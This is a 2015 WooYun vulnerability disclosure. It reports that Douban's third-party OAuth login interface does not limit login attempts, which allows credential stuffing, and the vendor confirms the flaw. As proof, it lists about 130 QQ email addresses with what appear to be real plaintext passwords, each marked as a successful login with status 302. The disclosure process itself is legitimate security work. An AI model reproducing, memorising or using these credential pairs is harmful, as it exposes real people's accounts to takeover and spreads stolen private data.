当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136042

漏洞标题:豆瓣第三方登录接口问题,导致撞库泄露用户帐号

相关厂商:豆瓣

漏洞作者: sqlfeng

提交时间:2015-08-23 21:02

修复时间:2015-10-08 10:58

公开时间:2015-10-08 10:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

第三方登录接口

详细说明:

https://www.douban.com/service/auth2/auth?client_id=08710dbc5a7ae51c195329350f70af54&redirect_uri=http%3A%2F%2Fwww.zenlifestore.com%2Flogin%2Fgetloginfordouban&response_type=code
这类的登录接口
没有限制登录次数

漏洞证明:

1.png


Payload1	Payload2	Status
396015998@qq.com	101595	302
285788647@qq.com	110112	302
111111@qq.com	111111	302
111111@qq.com	111111	302
364223309@qq.com	11111111	302
wqi_ang@qq.com	1123581321	302
330902646@qq.com	116116	302
120781269@qq.com	120781269	302
121763469@qq.com	121763469	302
506976994@qq.com	123123	302
wmydjwmy@vip.qq.com	1233212	302
517863666@qq.com	123456	302
weiwu_my@qq.com	12345zxcvb	302
417554787@qq.com	123bing	302
286963822@qq.com	125463	302
452091685@qq.com	13127732113	302
moshizhishang@qq.com	13803262661	302
413956859@qq.com	15021160628	302
358428949@qq.com	159357	302
263658781@qq.com	16569673	302
11314018@qq.com	168vcd	302
6524178@qq.com	16934150	302
417135509@qq.com	1835Lay	302
54981193@qq.com	19820926	302
2859313@qq.com	19840616	302
364571610@qq.com	19851120	302
lalaya5tvxq@qq.com	19860126zz	302
63541549@qq.com	19861025	302
thinker1000@qq.com	19871008	302
52693830@qq.com	19871013	302
104694794@qq.com	19871206	302
277676908@qq.com	1987523	302
976425750@qq.com	19881011	302
935492862@qq.com	19890404b	302
328645827@qq.com	198917	302
429797351@qq.com	19920521	302
330198873@qq.com	2236831	302
309337150@qq.com	23865942	302
243034478@qq.com	243034478	302
270323200@qq.com	246464	302
mimilucky916@qq.com	26606090	302
860124666@qq.com	303971	302
502233506@qq.com	306100608	302
21620341@qq.com	3303153	302
229004586@qq.com	3303855	302
408590115@qq.com	3314161	302
362054737@qq.com	3320110	302
649081773@qq.com	3322342	302
354978028@qq.com	354978028	302
40328642@qq.com	40328642	302
106355057@qq.com	403403	302
410202552@qq.com	410202552	302
764604460@qq.com	423156	302
20562412@qq.com	471775	302
284977395@qq.com	4754643	302
465361539@qq.com	49192009	302
837174671@qq.com	5106231990	302
741704358@qq.com	519999999	302
mukeyiyi@qq.com	520120	302
453875990@qq.com	52012513	302
527505643@qq.com	527505643	302
234137801@qq.com	52mingming	302
341815096@qq.com	540750	302
tonghaomail@qq.com	5529559	302
912326545@qq.com	5645769	302
418701453@qq.com	5772060	302
40079141@qq.com	58421q	302
371035795@qq.com	585858	302
597536395@qq.com	597536395	302
78877314@qq.com	59aiang	302
6158153@qq.com	6158153	302
95550029@qq.com	6225065	302
amimoon@qq.com	630417	302
448946157@qq.com	64462888	302
340291837@qq.com	66256991	302
195436209@qq.com	696969	302
270915063@qq.com	730913	302
67127233@qq.com	743691	302
441905149@qq.com	7758258	302
39918021@qq.com	7758521	302
nakedemo@vip.qq.com	79356587	302
45907944@qq.com	8100988	302
526238593@qq.com	818168	302
422124032@qq.com	8297193	302
545714273@qq.com	8310207	302
270152946@qq.com	840626	302
273310824@qq.com	84109169	302
246103194@qq.com	85127559	302
215004865@qq.com	8565841	302
tonykobe24@qq.com	8601327	302
93943391@qq.com	860613	302
hdjmcn@qq.com	86891992	302
110801174@qq.com	870108	302
princess881119@qq.com	881119	302
379648947@qq.com	881130	302
wlc8245@qq.com	88297613	302
78981277@qq.com	888567	302
32480043@qq.com	970709	302
405206752@qq.com	a19880725	302
kuhooid@vip.qq.com	admin123456	302
352330139@qq.com	andy2008	302
920426588@qq.com	at201314	302
649227826@qq.com	bxfllmzhu	302
36460092@qq.com	chen0806	302
ske000@qq.com	chenjietan	302
550546824@qq.com	cl123456	302
492609164@qq.com	ewaychen	302
313226629@qq.com	hao142753	302
gonghuikang@qq.com	haoren	302
327795@qq.com	iloveme	302
363366816@qq.com	jj3592371	302
playjxtz@qq.com	kknima	302
359521140@qq.com	l19900829	302
85094170@qq.com	lipengan	302
670368690@qq.com	luna19750502	302
68566676@qq.com	lw5211314	302
274054532@qq.com	mengbd520	302
510288807@qq.com	myself	302
474511944@qq.com	nokia880823	302
331371824@qq.com	qaz5989126	302
734258007@qq.com	shui2030jin	302
279528329@qq.com	tlj5201314	302
32726312@qq.com	wangbin	302
27909750@qq.com	wanghuijie520	302
512305671@qq.com	wj860320	302
554023733@qq.com	woaishuai	302
644328722@qq.com	wz1988	302
xuchen19840511@qq.com	x59734565	302
441967457@qq.com	yamaha123	302
529061491@qq.com	z86813092	302
376904013@qq.com	zr1989221	302

修复方案:

不知道了。。。

版权声明:转载请注明来源 sqlfeng@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-24 10:57

厂商回复:

确实是个设计缺陷 立即组织修复

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-24 11:20 | sqlfeng ( 普通白帽子 | Rank:198 漏洞数:34 | 不会弹吉它的黑客不是好歌手)

    小厂商- -

  2. 2015-08-24 11:29 | sqlfeng ( 普通白帽子 | Rank:198 漏洞数:34 | 不会弹吉它的黑客不是好歌手)

    流程